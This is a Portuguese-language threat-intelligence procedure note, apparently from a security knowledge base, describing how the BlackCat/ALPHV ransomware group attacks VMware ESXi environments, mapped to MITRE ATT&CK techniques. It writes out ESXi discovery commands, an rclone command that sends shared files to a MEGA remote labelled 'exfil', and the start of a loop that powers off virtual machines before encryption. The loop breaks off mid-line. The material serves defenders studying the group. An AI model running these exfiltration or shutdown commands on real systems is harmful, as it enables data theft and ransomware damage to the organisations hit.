# PROC - BlackCat/ALPHV: Criptografia de Ambientes VMware ESXi
## Visão Geral
O [[ALPHV]] e um dos grupos de ransomware mais sofisticados da historia recente, sendo o primeiro a desenvolver seu payload inteiramente em Rust - escolha deliberada que confere portabilidade multiplataforma e dificulta engenharia reversa. O grupo opera sob modelo RaaS (Ransomware-as-a-Service) e se especializou em ataques contra infraestruturas de virtualização VMware ESXi, capazes de paralisar simultaneamente dezenas ou centenas de maquinas virtuais com uma única execução.
A abordagem contra ESXi e especialmente devastadora: ao criptografar os volumes de armazenamento compartilhados (VMFS datastores), todos os guests VMs ficam indisponiveis instantaneamente, sem necessidade de infectar cada maquina individualmente. O grupo realiza dupla extorsao - criptografia dos dados mais ameaça de vazamento público em seu site de leak "ALPHV Collections". Em 2024, o BlackCat executou o ataque ao Change Healthcare, considerado o maior cyberincidente contra o setor de saúde americano, com resgate de 22 milhões de dólares.
O procedimento e altamente modular: diferentes afiliados adaptam o vetor de entrada (VPN, RDP, phishing), mas o core da exfiltração e criptografia ESXi e consistente e padronizado - sinal de um kit RaaS maduro com tooling especializado para ambientes VMware.
## Attack Flow
```mermaid
graph TB
A["🎯 Acesso Inicial<br/>VPN/RDP/Phishing"] --> B["🔍 Reconhecimento<br/>Mapeamento de VMs e datastores"]
B --> C["📤 Exfiltração<br/>Rclone + MEGAsync"]
C --> D["🦀 Deploy BlackCat Linux<br/>Encryptor em Rust para ESXi"]
D --> E["💀 Desligamento de VMs<br/>esxcli/vim-cmd"]
E --> F["🔒 Criptografia VMFS<br/>Datastores e arquivos .vmdk"]
F --> G["📋 Nota de Resgaté<br/>HOW_TO_DECRYPT.txt em cada dir"]
G --> H["🌐 Dupla Extorsao<br/>ALPHV Collections leak site"]
```
## Passo a Passo
### Fase 1 - Acesso Inicial e Escalada
O BlackCat/ALPHV obtém acesso inicial predominantemente via credenciais VPN roubadas ou força bruta em endpoints RDP expostos ([[t1078-valid-accounts|T1078]]). Em campanhas mais direcionadas, exploram vulnerabilidades em soluções de acesso remoto como Fortinet FortiGaté ([[t1190-exploit-public-facing-application|T1190]]) e Citrix Netscaler (CVE-2023-4966 - Citrix Bleed).
Após acesso inicial em endpoint Windows, o grupo usa ferramentas como [[s0154-cobalt-strike|Cobalt Strike]], [[s1063-brute-ratel-c4|Brute Ratel C4]] ou o próprio implante Sphynx (variante do BlackCat) para movimento lateral ([[t1021-remote-services|T1021]]). O objetivo é alcançar credenciais de administrador do vCenter ou acesso SSH direto ao host ESXi.
### Fase 2 - Reconhecimento de Infraestrutura Virtual
Com acesso ao vCenter ou ESXi, o grupo executa comandos de descoberta ([[t1082-system-information-discovery|T1082]]):
```bash
# Listar todas as VMs registradas
esxcli vm process list
# Mapear datastores disponíveis
esxcli storage filesystem list
# Verificar VMs por datastore
vim-cmd vmsvc/getallvms
```
Este mapeamento define o escopo do ataque - o grupo prioriza datastores com maior volume de VMs críticas (servidores de banco de dados, controladores de domínio, sistemas de backup).
### Fase 3 - Exfiltração Pre-Ransomware
Antes de qualquer criptografia, o grupo exfiltra dados sensíveis usando [[s1040-rclone|Rclone]] configurado para MEGA ou para servidores WebDAV controlados pelos atacantes ([[t1048-exfiltration-over-alternative-protocol|T1048]]). Documentos alvos incluem: dados financeiros, informações de clientes, propriedade intelectual, credenciais adicionais.
```bash
# Exemplo de comando rclone usado pelo grupo
rclone copy /mnt/sharepoint mega:exfil --transfers 10 --checkers 20
```
A exfiltração ocorre dias ou semanas antes da criptografia - o grupo aguarda confirmação de dados valiosos antes de acionar o payload.
### Fase 4 - Deploy do Encryptor ESXi
O encryptor Linux/ESXi do BlackCat, escrito em Rust, é transferido via SCP ou wget para o host ESXi diretamente:
```bash
# Desligamento de todas as VMs antes da criptografia
for vmid in $(vim-cmd vmsvc/getallvms | awk '{print $1}' | grep -E '^[0-9]+